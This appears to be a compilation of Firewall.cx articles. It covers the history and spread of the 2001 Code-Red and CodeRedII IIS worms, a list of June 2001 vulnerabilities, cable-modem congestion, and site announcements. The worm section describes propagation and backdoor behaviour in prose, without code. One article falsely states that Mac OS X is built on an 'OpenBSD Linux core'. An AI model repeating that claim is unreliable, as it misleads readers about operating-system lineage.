On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

A security patch for this vulnerability is available from Microsoft at
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp.


Code-Red version 1 (CRv1)

Detailed information about Code-Red version 1 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html).

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once-rebooted, the machine is still vulnerable to repeat infection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.


Code-Red version 2

Detailed information about Code-Red version 2 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html) and silicon defense (http://www.silicondefense.com/cr/).

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.


CodeRedII

Detailed information about CodeRedII can be found at eEye (http://www.eeye.com/html/Research/Advisories/AL20010804.html) and http://aris.securityfocus.com/alerts/codered2/.

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.

Although we attempted to identify the geographic location of each host as accurately
as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries is an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

Quicktime animation of growth by geographic breakdown (200K .mov - requires QuickTime v3 or newer )

  • Hits: 17280

Windows Bugs Everywhere!

Vulnerabilities, bugs and exploits will keep you on your toes

Every day a new exploit, bug, or vulnerability is found and reported on the Internet, in the news and on TV. Although Microsoft seems to get the greatest number of bug reports and alerts, they are not alone. Bugs are found in all of the operating systems, whether it is server software, desktop software or imbedded systems.

Here is a list of bugs and flaws affecting Microsoft products that have been uncovered just in the month of June 2001:

  • MS Windows 2000 LDAP SSL Password Modification Vulnerability
  • MS IIS Unicode .asp Source Code Disclosure Vulnerability
  • MS Visual Studio RAD Support Buffer Overflow Vulnerability
  • MS Index Server and Indexing Service ISAPI Extension
  • Buffer Overflow Vulnerability
  • MS SQL Server Administrator Cached Connection Vulnerability
  • MS Windows 2000 Telnet Privilege Escalation Vulnerability
  • MS Windows 2000 Telnet Username DoS Vulnerability
  • MS Windows 2000 Telnet System Call DoS Vulnerability
  • MS Windows 2000 Telnet Multiple Sessions DoS Vulnerability
  • MS W2K Telnet Various Domain User Account Access Vulnerability
  • MS Windows 2000 Telnet Service DoS Vulnerability
  • MS Exchange OWA Embedded Script Execution Vulnerability
  • MS Internet Explorer File Contents Disclosure Vulnerability
  • MS Outlook Express Address Book Spoofing Vulnerability


The mere frequency and number of bugs that are being found does not bode well for Microsoft and the security of their programming methods. These are just the bugs that have been found and reported, but bugs like the Internet Explorer bug may have been around and exploited for months and hidden from discovery by the underground community.

But it isn't just Microsoft that is plagued with bugs and vulnerabilities. All flavors of Linux have their share of serious bugs also. The vulnerabilities below have also been discovered or reported for the month of June 2001:

  • Procfs Stream Redirection to Process Memory Vulnerability
  • Samba remote root vulnerability
  • Buffer overflow in fetchmail vulnerability
  • cfingerd buffer overflow vulnerability
  • man/man-db MANPATH bugs exploit
  • Oracle 8i SQLNet Header Vulnerability
  • Imap Daemon buffer overflow vulnerability
  • xinetd logging code buffer overflow vulnerability
  • Open SSH cookie file deletion vulnerability
  • Solaris libsldap Buffer Overflow Vulnerability
  • Solaris Print Protocol buffer overflow vulnerability


These are not all of the bugs and exploits that affect *nix systems, there are at least as many *nix bugs found in the month of June as there are for Microsoft products. Even the Macintosh OS, the operating system that is famous for being almost hacker proof, is also vulnerable. This is especially true with the release of OS X. This is because OS X is built on an OpenBSD Linux core. Many of the Linux/BSD specific vulnerabilities can also affect the Macintosh OS X. As an example the Macintosh OS X is subject to the SUDO buffer overflow vulnerability.

Does all of this mean that you should just throw up your hands and give up? Absolutely not! Taken as a whole the sheer number of bugs and vulnerabilities is massive and almost overwhelming. The point is that if you keep up with the latest patches and fixes, your job of keeping your OS secure is not so daunting.

Keeping up is simple if you just know where to look. Each major OS keeps a section of their Web site that is dedicated to security, fixes and patches. Here is a partial list categorized by operating system:

Windows
The Microsoft TechNet section on security contains information on the latest vulnerabilities, bugs, patches and fixes. It also has a searchable database that you can search by product and service pack.

Linux
Since there are so many different flavors of Linux I will list some of the most popular ones here.

RedHat

Alerts and Errata
RedHat lists some of the most recent vulnerabilities here as well as other security links on the RedHat site and security links that can be found elsewhere on the Web.

Slackware

Security Mailing List Archives
Although not as well organized as the Microsoft or RedHat sites, the mailing list archives contain a wealth of information. The archive is organized by year and then by month.

Apple Product Security
Even though the Mac is not as prone to security problems as other OSs, you should still take steps to secure your Mac. With the introduction of OS X, security will be more of a concern.

Keeping up is simple if you just know where to look. Each major OS keeps a section of their Web site that is dedicated to security, fixes and patches. Here is a partial list categorized by operating system:

Windows

TechNet Security Bulletins
The Microsoft TechNet section on security contains information on the latest vulnerabilities, bugs, patches and fixes. It also has a searchable database that you can search by product and service pack.

Linux

Since there are so many different flavors of Linux I will list some of the most popular ones here.

RedHat

Alerts and Errata
RedHat lists some of the most recent vulnerabilities here as well as other security links on the RedHat site and security links that can be found elsewhere on the Web.

Slackware

Security Mailing List Archives
Although not as well organized as the Microsoft or RedHat sites, the mailing list archives contain a wealth of information. The archive is organized by year and then by month.

SuSe

SuSE Linux Homepage
Included here is an index of alerts and announcements on SuSe security. There is also a link for you to subscribe to the SuSe Security Mailing list.

Solaris

Security
This is one of the most comprehensive and complete security sites of all of the OSs. If you can't find it here, you won't find it anywhere.

Macintosh

Apple Product Security
Even though the Mac is not as prone to security problems as other OSs, you should still take steps to secure your Mac. With the introduction of OS X, security will be more of a concern.
  • Hits: 14695

The Cable Modem Traffic Jam

Tie-ups that slow broadband Internet access to a crawl are a reality--but solutions are near at hand
The Cable Modem Traffic Jam

articles-connectivity-cmtj-1-1 Broadband access to the Internet by cable modem promises users lightning-fast download speeds and an always-on connection. And recent converts to broadband from dial-up technology are thrilled with complex Web screens that download before their coffee gets cold.

But, these days, earlier converts to broadband are noticing something different. They are seeing their Internet access rates slow down, instead of speed up. They are sitting in a cable modem traffic jam. In fact, today, a 56K dial-up modem can at times be faster than a cable modem and access can be more reliable.

Other broadband service providers--digital subscriber line (DSL), integrated-services digital networks (ISDNs), satellite high-speed data, and microwave high-speed data--have their own problems. In some cases, service is simply not available; in other situations, installation takes months, or the costs are wildly out of proportion. Some DSL installations work fine until a saturation point of data subscribers per bundle of twisted pairs is reached, when the crosstalk between the pairs can be a problem. 

In terms of market share, the leaders in providing broadband service are cable modems and DSL as shown below:

articles-connectivity-cmtj-2-1

But because the cable modem was the first broadband access technology to gain wide popularity, it is the first to face widespread traffic tie-ups. These tie-ups have been made visible by amusing advertisements run by competitors, describing the "bandwidth hog" moving into the neighborhood. In one advertisement, for example, a new family with teenagers is seen as a strain on the shared cable modem interconnection and is picketed. (The message is that this won't happen with DSL, although that is only a half-truth.)

So, today, the cable-modem traffic jam is all too real in many cable systems. In severe cases, even the always-on capability is lost. Still, it is not a permanent limitation of the system. It is a temporary problem with technical solutions, if the resources are available to implement the fixes. But during the period before the corrections are made, the traffic jam can be a headache.

Cable modem fundamentals

Today's traffic jam stems from the rapid acceptance of cable broadband services by consumers. A major factor in that acceptance was the 1997 standardization of modem technology that allowed consumers to own the in-home hardware and be happy that their investment would not be orphaned by a change to another cable service provider.

A cable modem system can be viewed as having several components:

articles-connectivity-cmtj-3-1

The cable modem connects to the subscriber's personal computer through the computer's Ethernet port. The purpose of this connection is to facilitate a safe hardware installation without the need for the cable technician to open the consumer's PC. If the PC does not have an Ethernet socket, commercially available hardware and software can be installed by the subscriber or by someone hired by the subscriber.

Downstream communication (from cable company headend to cable subscriber's modem) is accomplished with the same modulation systems used for cable digital television. There are two options, both using packetized data and quadrature amplitude modulation (QAM) in a 6-MHz channel, the bandwidth of an analog television channel. QAM consists of two sinusoidal carriers that are phase shifted 90 degrees with respect to each other (that is, the carriers are in quadrature with each other) and each is amplitude modulated by half of the data. The slower system uses 64 QAM with an approximate raw data rate of 30 Mb/s and a 27-Mb/s payload information rate (which is the actual usable data throughput after all error correction and system control bits are removed). The faster system uses 256 QAM with an approximate raw data rate of 43 Mb/s and a payload information rate of 39 Mb/s.

With 64 QAM, each carrier is amplitude modulated with one of eight amplitude levels. The product of the two numbers of possible amplitude levels is 64, meaning that one of 64 possible pieces of information can be transmitted at a time. Since 2^6 is 64, with 64 QAM modulation, 6 bits of data are transmitted simultaneously. Similarly, with 256 QAM, each carrier conveys one of 16 amplitude levels, and since 256 is 2^8, 8 bits of data are transmitted simultaneously. The higher speed is appropriate for newer or upgraded cable plant, while the lower speed is more tolerant of plant imperfections, such as the ingress of interfering signals and reflected signals from transmission line impedance discontinuities.

The upstream communications path (from cable modem to cable headend) resides in a narrower, more challenged spectrum. A large number of sources of interference limits the upstream communication options and speeds. Signals leak into the cable system through consumer-owned devices, through the in-home wiring, the cable drop, and the distribution cable. Fortunately, most modern cable systems connect the neighborhood to theheadend with optical fiber, which is essentially immune to interfering electromagnetic signals. A separate fiber is usually used for the upstream communications from each neighborhood. Also, the upstream bandwidth is not rigorously partitioned into 6-MHz segments.

Depending on the nature of the cable system, one or more of a dozen options for upstream communications are utilized. The upstream bandwidth and frequency are chosen by the cable operator so as to avoid strong interfering signals.

The cable modem termination system (CMTS) is an intelligent controller that manages the system operation. Managing the upstream communications is a major challenge because all of the cable modems in the subscriber's area are potentially simultaneous users of that communications path. Of course, only one cable modem can instantaneously communicate upstream on one RF channel at a time. Since the signals are packetized, the packets can be interleaved, but they must be timed to avoid collisions.

The 1997 cable modem standard included the possibility of an upstream telephone communications path for cable systems that have not implemented two-way cable. Such one-way cables have not implemented an upstream communications path from subscriber to headend. Using a dial-up modem is a practical solution since most applications involve upstream signals that are mainly keystrokes, while the downstream communications includes much more data-intensive messages that fill the screen with colorful graphics and photographs and even moving pictures and sound. The CMTS system interfaces with a billing system to ensure that an authorized subscriber is using the cable modem and that the subscriber is correctly billed.

The CMTS manages the interface to the Internet so that cable subscribers have access to more than just other cable subscribers' modems. This is accomplished with a router that links the cable system to the Internet service provider (ISP), which in turn links to the Internet. The cable company often dictates the ISP or may allow subscribers to choose from among several authorized ISPs. The largest cable ISP is @Home, which was founded in 1995 by TCI (now owned by AT&T), Cox Communications, Comcast, and others. Another ISP, Road Runner, was created by Time Warner Cable and MediaOne, which AT&T recently purchased.

Cable companies serving 80 percent of all North American households have signed exclusive service agreements with @Home or Road Runner. Two more cable ISPs--High Speed Access Corp. and ISP Channel--serve the remaining U.S. and Canadian broadband households. And other major cable companies, CableVision and Adelphia in the United States and Videotron in Canada, offer their own cable modem service.

Cable modem bottlenecks

If there were just one cable modem in operation, it could in principle have an ultimate data download capacity of 27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system. While the 256 is four times 64, the data capacity does not scale by this factor since the 8 bits simultaneously transmitted by 256 QAM are not four times the 6 bits simultaneously transmitted by 64 QAM. The 256 QAM data rates are only about 50 percent larger than the 64 QAM rates. Of course, if the cable modem is not built into a PC but is instead connected with an Ethernet link, the Ethernet connection is a bottleneck, albeit at 10 Mb/s. In any case, neither of these bottlenecks is likely to bring any complaints since downloads at these speeds would be wonderful.

A much more likely bottleneck is in the cable system's connection to the Internet or in the Internet itself or even the ultimate Web site. For example, Ellis Island recently opened its Web site to citizens to let them search for their ancestors' immigration records, and huge numbers of interested users immediately bogged down the site. No method of subscriber broadband access could help this situation since the traffic jam is at the information source. A chain is only as strong as its weakest link; if the link between the cable operator and the ISP has insufficient capacity to accommodate the traffic requested by subscribers, it will be overloaded and present a bottleneck.

This situation is not unique to a cable modem system. Any system that connects subscribers to the Internet will have to contract for capacity with an ISP or a provider of connections to the Internet backbone, and that capacity must be shared by all the service's subscribers. If too little capacity has been ordered, there will be a bottleneck. This limitation applies to digital subscriber line systems and their connections to the Internet just as it does to cable systems. If the cable operator has contracted with an ISP, the ISP's Internet connection is a potential bottleneck, because it also serves other customers. Of course, the Internet itself can be overloaded as it races to build infrastructure in step with user growth.

Recognizing that the Internet itself can slow things down, cable operators have created systems that cache popular Web sites closer to the user and that contain local sites of high interest. These sites reside on servers close to the subscriber and reduce dependence on access to the Internet. Such systems have been called walled gardens because they attempt to provide a large quantity of interesting Web pages to serve the subscriber's needs from just a local server. Keeping the subscriber within the walled garden not only reduces the demand on the Internet connection, but can also make money for the provider through the sale of local advertising and services. This technique can become overloaded as well. But curing this overload is relatively easy with the addition of more server capacity (hardware) at the cache site.

Two cable ISPs, Road Runner and @Home, were designed to minimize or avoid Internet bottlenecks. They do it by leasing virtual private networks (VPNs) to provide nationwide coverage. VPNs consist of guaranteed, dedicated capacity, which will ensure acceptable levels of nationwide data transport to local cable systems. @Home employs a national high-speed data backbone through leased capacity from AT&T. Early on, a number of problems caused traffic jams, but these are now solved.

Other potential bottlenecks are the backend systems that control billing and authorization of the subscriber's service. As cable modem subscriber numbers grow, these systems must be able to handle the load.

The capacity on the cable system is shared by all the cable modems connected to a particular channel on a particular node. Cable systems are divided into physical areas of several hundred to a few thousand subscribers, each of which is served by a node. The node converts optical signals coming from (and going to) the cable system's headend into radio frequency signals appropriate for the coaxial cable system that serves the homes in the node area:

articles-connectivity-cmtj-4-1

Only the cable modems being used at a particular time fight for sizable amounts of the capacity. Modems that are connected but idle are not a serious problem, as they use minimal capacity for routine purposes.

Clearly, success on the part of a cable company can be a source of difficulty if it sells too many cable modems to its subscribers for the installed capacity. The capacity of a given 6-MHz channel assigned to the subscribers' neighborhood and into their premises is limited to the amounts previously discussed (27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system) and the demand for service can exceed that capacity. Both upstream and downstream bandwidth limitations can hinder performance. Upstream access is required to request downloads and to upload files. Downstream access provides the desired information.

Usually, it is the downstream slowdown that is noticed. Some browsers (the software that interprets the data and paints the images on the computer screen) include so-called fuel gages or animated bar graphs that display the progress of the download. They can be satisfying when they zip along briskly, but rub salt in the wound when they crawl slowly and remind the user that time is wasting.

Bandwidth hogs in a subscriber's neighborhood can be a big nuisance. As subscribers attempt to share large files, like music, photos, or home movies, they load up the system. One of the rewards of high-speed Internet connections is the ability to enjoy streaming video and audio. Yet these applications are a heavy load on all parts of the system, not just the final link. System capacity must keep up with both the number of subscribers and the kinds of applications they demand. As the Internet begins to look more like television with higher-quality video and audio, it will require massive downstream capacity to support the data throughput. As the Internet provides more compelling content, it will attract even more subscribers. So the number of subscribers grows and the bandwidth each demands also grows. Keeping up with this growth is a challenge.

Impact of open access

Open access is the result of a fear on the part of the government regulators that cable system operators will be so successful in providing high-speed access to the Internet that other ISPs will be unable to compete. The political remedy is to require cable operators to permit competitive ISPs to operate on their systems. Major issues include how many ISPs to allow, how to integrate them into the cable system, and how to charge them for access. The details of how open access is implemented may add to the traffic jam.

A key component in dealing with open access is the CMTS. The ports on the backend of this equipment connect to the ISPs. But sometimes too few ports are designed into the CMTS for the number of ISPs wishing access. More recent CMTS designs accommodate this need. However, these are expensive pieces of equipment, ranging up to several hundreds of thousands of dollars. An investment in an earlier unit cannot be abandoned without great financial loss.

If the cost of using cable modem access is fairly partitioned between the cost of using the cable system and the access fees charged by the cable company, then the cable operator is fairly compensated for the traffic. With more ISPs promoting service, the likelihood is that there will be more cable modem subscribers and higher usage. This, of course, will contribute to the traffic jam. In addition, the backend processing of billing and cable modem authorization can be a strain on the system.

What to do about the traffic jam?

The most important development in dealing with all these traffic delays is the release of the latest version of the cable modem technical standard. Docsis Release 1.1 (issued by CableLabs in 1999) includes many new capabilities, of which the most pertinent in this context is quality of service (QoS). In most aspects of life, the management of expectations is critical to success. When early adopters of cable modem service shared a lightly loaded service, they became accustomed to lightning access. When more subscribers were added, the loading of the system lowered speed noticeably for each subscriber in peak service times.

Similarly, the difference between peak usage times and the late night or early morning hours can be substantial. It is not human nature to feel grateful for the good times while they last, but rather to feel entitled to good times all the time. The grades of service provided by QoS prevent the buildup of unreasonable expectations and afford the opportunity to contract for guaranteed levels of service. Subscribers with a real need for speed can get it on a reliable basis by paying a higher fee while those with more modest needs can pay a lower price. First class, business class, and economy can be implemented with prices to match.

Beefing up to meet demand

Network traffic engineering is the design and allocation of resources to satisfy demand on a statistical basis. Any economic system must deal with peak loads while not being wasteful at average usage times. Consumers find it difficult to get a dial tone on Mother's Day, because it would be impractically expensive to have a phone system that never failed to provide dial tone. The same is true of a cable modem system. At unusually high peaks, service may be temporarily delayed or even unavailable.

An economic design matches the capacity of all of the system elements so that no element is underutilized while other elements are under constant strain. This means that a properly designed cable modem system will not have one element reach its maximum capacity substantially before other elements are stressed. There should be no weakest links. All links should be of relatively the same capacity.

More subscribers can be handled by allocating more bandwidth. Instead of just one 6-MHz channel for cable modem service, two or more can be allocated along with the hardware and software to support this bandwidth. Since many cable systems are capacity limited, the addition of another 6-MHz channel can be accomplished only by sacrificing the service already assigned to it. A typical modem cable system would have a maximum frequency of about 750 MHz. This allows for 111 or so 6-MHz channels to be allocated to conflicting demands. Perhaps 60-75 of them carry analog television. The remainder are assigned to digital services such as digital television, video on demand, broadband cable service, and telephony.

Canceling service to free up bandwidth for cable modems may cause other subscriber frustrations. While adding another 6-MHz channel solves the downstream capacity problem, if the upstream capacity is the limiting factor in a particular cable system, merely adding more 6-MHz channels will still leave a traffic jam. The extra channels help with only one of the traffic directions.

Cable nodalization is another important option in cable system design for accommodating subscriber demand. Nodalization is essentially the dividing up of the cable system into smaller cable systems, each with its own path to the cable headend. The neighborhood termination of that path is called a node. In effect, then, several cables, instead of a single cable, come out of the headend to serve the neighborhoods.

Cable system nodes cater to anywhere from several thousand subscribers to just a few hundred. Putting in more nodes is costly, but the advantage of nodalization is that the same spectrum can be used differently at each node. A specific 6-MHz channel may carry cable modem bits to the users in one node while the same 6-MHz channel carries completely different cable modem bits to other users in an adjacent node. This has been called space-division multiplexing since it permits different messages to be carried, depending on the subscriber's spatial location.

An early example of this principle was deployed in the Time Warner Cable television system in Queens, New York City. Queens is a melting pot of nationalities. The immigrants there tend to cluster in neighborhoods where they have relatives and friends who can help them make the transition to the new world. The fiber paths to these neighborhoods can use the same 6-MHz channel for programs in different languages. So a given channel number can carry Chinese programming on the fiber serving that neighborhood, Korean programming on another fiber, and Japanese programming on still another fiber. As the 747s fly into the John F. Kennedy International Airport in Queens each night, they bring tapes from participating broadcasters in other countries that become the next day's programming for the various neighborhoods. (Note that this technique is impossible in a broadcast or satellite transmission system since such systems serve the entire broadcast area and cannot employ nodalization.)

The same concept of spectrum reuse is applied to the cable modem. A 6-MHz channel set aside for this purpose carries the cable modem traffic for the neighborhood served by its respective node. While most channels carry the same programming to all nodes, just the channel(s) assigned to the modem service carry specialized information directed to the individual nodes. Importantly, nodalization reuses the upstream spectrum as well as the downstream spectrum. So, given enough nodes, traffic jams are avoided in both directions.

However, nodalization is costly. Optical-fiber paths must be installed from the headend to the individual nodes. The fiber paths require lasers and receivers to convert the optical signals into electrical signals for the coaxial cable in the neighborhood. Additional modulators per node are required at the cable headend , as well as routers to direct the signals to their respective lasers. The capital investment is substantial. However, it is technically possible to solve the problem. (In principle, nodalization could be implemented in a fully coaxial cable system. But in practice coaxial cable has a lot higher losses than fiber and incurs even greater expense in the form of amplifiers and their power supplies.)

Other techniques for alleviating the traffic jam include upgrading the cable system so that 256 QAM can be used instead of 64 QAM downstream and 16 QAM can be used upstream instead of QPSK. If the ISP's connection to the Internet is part of the problem, a larger data capacity connection to the Internet backbone can be installed.

Also, non-Docsis high-speed access systems are under development for very heavy users. These systems will provide guaranteed ultrahigh speeds of multiple megabits per second in the downstream direction while avoiding the loading of the Docsis cable modem channels. The service can then be partitioned into commercial and residential or small business services that do not limit each other's capabilities.

Speculations on the future

The cable modem traffic jam is due to rapid growth that sometimes outpaces the resources available to upgrade the cable system. But solutions may be near at hand.

The next wave of standardization, Docsis 1.1 released in 1999, provides for quality-of-service segmentation of the market. Now that the standard is released, products are in development by suppliers and being certified by CableLabs. Release 1.1 products will migrate into the subscriber base over the next several years. Subscribers will then be able to choose the capacity they require for their purposes and pay an appropriate fee. The effect will be to discourage bandwidth hogs and ensure that those who need high capacity, and are willing to pay for it, get it. And market segmentation will provide financial justification to implement even more comprehensive nodalization. After enough time has passed for these system upgrades to be deployed, the traffic jam should resolve itself.

  • Hits: 19243
Cisco WLC & AP Compatibility Matrix Download

Complete Cisco WLC Wireless Controllers, Aironet APs & Software Compatibility Matrix - Free Download

cisco wlc ap compatibility list downloadFirewall.cx’s download section now includes the Cisco WLC Wireless Controllers Compatibility Matrix as a free download. The file contains two PDFs with an extensive list of all old and new Cisco Wireless Controllers and their supported Access Points across a diverse range of firmware versions.

WLCs compatibility list includes: WLC 2100, 2504, 3504, 4400, 5508, 5520, 7510, 8510, 8540, Virtual Controller, WiSM, WiSM2, SRE, 9800 series and more. 

Access Point series compatibility list includes: 700, 700W, 1000, 1100, 1220, 1230, 1240, 1250, 1260, 1300, 1400, 1520, 1530, 1540, 1550, 1560, 1600, 1700, 1800, 2600, 2700, 2800, 3500, 3600, 3700, 3800, 4800, IW6300, 9100, 9130, 9160,

The compatibility matrix PDFs provide an invaluable map, ensuring that your network components are supported across different software versions. Make informed choices, plan upgrades with precision, and optimize your network's performance effortlessly.

Check the compatibility between various WLC hardware & virtual versions, Access Points and a plethora of Cisco software offerings, such as Cisco Identity Services Engine (ISE), Cisco Prime Infrastructure, innovative Cisco Spaces, and the versatile Mobility Express. This compatibility matrix extends far beyond devices, painting a holistic picture of how different elements of your Cisco ecosystem interact with one another.  Make informed choices, plan upgrades with precision, and optimize your network's performance effortlessly.

Click here to visit the download page.

  • Hits: 5198

Firewall.cx: 15 Years’ Success – New Logo – New Identity – Same Mission

This December (2015) is a very special one. It signals 15 years of passion, education, learning, success and non-stop ‘routing’ of knowledge and technical expertise to the global IT community.

What began 15 years ago as a small pitiful website, with the sole purpose of simplifying complicated networking & security concepts and sharing them with students, administrators, network engineers and IT Managers, went on to become one of the most recognised and popular network security websites in the world.

Thanks to a truly dedicated and honest team, created mainly after our forums kicked in on the 24th of October 2001, Firewall.cx was able to rapidly expand and produce more high-quality content that attracted not only millions of new visitors but also global vendors.

Our material was all of a sudden used at colleges and universities, was referenced by thousands of engineers and sites around the world, then Cisco Systems referenced Firewall.cx resources in its official global CCNA Academy Program!

Today we look back and feel extremely proud of our accomplishment and, after all the recognition, positive feedback from millions and success stories from people who moved forward in their professional career thanks to Firewall.cx, we feel obligated to continue working hard to help this amazing IT community.

Readers who have been following Firewall.cx since the beginning will easily identify the colourful Firewall.cx logo that has been with us since the site first went online. While we’ve changed the site’s design & platform multiple times the logo has remained the same, a piece of our history to which users can relate.

Obviously times have changed since 2000 and we felt (along with many other members) that it was time to move forward and replace our logo with one that will better suit the current Firewall.cx design & community, but at the same time make a real statement about who we are and what our mission is.

So, without any further delay, we would like to present to our community the new Firewall.cx logo:

Firewall.cx - New Logo - The Site for Networking Professionals

 

Explaining Our New Logo

Our new logo communicates what Firewall.cx and its community are all about. The new slogan precisely explains what we do: Route (verb) Information (knowledge) and Expertise to our audience of Network Professionals – that’s you. Of course, we still remain The No.1 Site for Networking Professionals :)

The icon on the left is a unique design that tells two stories:

  1. It’s a router, similar to Cisco’s popular Visio router icons, symbolising the “routing” process of information & expertise mentioned in our slogan.
  2. It symbolises four IT professionals: three represent our community (red) – that’s you, and the fourth (blue) is the Firewall.cx team. All four IT professionals are connected (via their right arm) and share information with each other (the arrows).

We hope our readers will embrace the new logo as much as we did and continue to use Firewall.cx as a trusted resource for IT Networking and Security topics.

On behalf of the Firewall.cx Team - Thank you for all your support. We wouldn’t be here without you.

Chris Partsenidis
Founder & Editor-in-Chief
  • Hits: 7302

Firewall.cx Free Cisco Lab: Equipment Photos

Our Cisco lab equipment has been installed in a 26U - 19' inch rack, complemented by blue neon lighting and a 420VA UPS to keep everything running smoothly, should a blackout occur.

The pictures taken show equipment used in all three labs. Please click on the picture of your choice to load a larger version.

cisco-lab-pictures-3-small

